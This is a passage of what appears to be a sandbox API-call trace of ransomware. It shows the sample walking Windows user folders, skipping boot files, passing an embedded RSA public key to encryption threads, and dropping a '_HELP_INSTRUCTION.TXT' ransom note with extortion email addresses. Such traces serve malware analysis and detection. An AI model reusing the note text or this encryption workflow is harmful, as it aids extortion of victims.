HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0109.741] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0109.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0109.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0109.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0109.741] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0109.741] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.741] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.741] lstrcmpW (lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpString2="..") returned 1 [0109.741] lstrcmpW (lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpString2=".") returned 1 [0109.741] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0109.741] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="ntldr") returned 0x0 [0109.741] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="NTLDR") returned 0x0 [0109.742] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0109.742] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0109.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="Desktop") returned 0x0 [0109.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0109.742] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 44 [0109.742] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.742] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0109.742] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0109.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0109.742] Sleep (dwMilliseconds=0x96) [0109.892] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.892] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0109.892] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0109.892] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0109.892] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0109.892] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0109.892] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0109.892] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0109.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0109.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="Desktop") returned 0x0 [0109.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0109.892] SetErrorMode (uMode=0x1) returned 0x1 [0109.892] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT") returned 61 [0109.893] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0109.893] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.893] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x43c) returned 0x0 [0109.893] RegQueryValueExW (in: hKey=0x43c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb5f40, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cb5f40*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0109.893] RegCloseKey (hKey=0x43c) returned 0x0 [0109.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.893] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0109.894] CloseHandle (hObject=0x43c) returned 1 [0109.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0109.894] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0109.894] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0109.894] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0109.894] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0109.894] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.894] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0109.894] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.894] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.894] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0109.895] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0109.895] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0109.895] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0109.895] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0109.895] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0109.895] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0109.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0109.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0109.895] SetErrorMode (uMode=0x1) returned 0x1 [0109.895] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0109.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0109.895] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0109.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0109.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0109.897] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0109.897] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0109.897] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.897] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.897] lstrcmpW (lpString1="72A6C9432269CCE1A510518B2681B129.XZZX", lpString2="..") returned 1 [0109.897] lstrcmpW (lpString1="72A6C9432269CCE1A510518B2681B129.XZZX", lpString2=".") returned 1 [0109.897] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0109.897] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="ntldr") returned 0x0 [0109.897] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="NTLDR") returned 0x0 [0109.897] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0109.897] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="ntdetect.com") returned 0x0 [0109.897] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="Desktop") returned 0x0 [0109.897] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0109.897] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 44 [0109.897] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.897] lstrcpyW (in: lpString1=0x17cf1c, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0109.897] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0109.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x444 [0109.898] Sleep (dwMilliseconds=0x96) [0110.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.048] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0110.048] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0110.048] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0110.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0110.049] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0110.049] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0110.050] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0110.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0110.050] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="Desktop") returned 0x0 [0110.050] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0110.050] SetErrorMode (uMode=0x1) returned 0x1 [0110.050] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT") returned 61 [0110.050] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0110.051] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0110.051] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x448) returned 0x0 [0110.055] RegQueryValueExW (in: hKey=0x448, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb6170, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cb6170*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0110.055] RegCloseKey (hKey=0x448) returned 0x0 [0110.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0110.055] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0110.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0110.057] CloseHandle (hObject=0x448) returned 1 [0110.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0110.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0110.057] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0110.057] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0110.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.057] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.057] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.057] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0110.057] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0110.057] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0110.057] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0110.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0110.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0110.058] SetErrorMode (uMode=0x1) returned 0x1 [0110.058] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0110.058] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.058] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.058] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0110.058] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0110.059] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0110.059] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0110.059] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.059] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.059] lstrcmpW (lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpString2="..") returned 1 [0110.059] lstrcmpW (lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpString2=".") returned 1 [0110.059] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.059] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="ntldr") returned 0x0 [0110.059] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="NTLDR") returned 0x0 [0110.059] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.059] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.060] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0110.060] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0110.060] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0110.060] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW 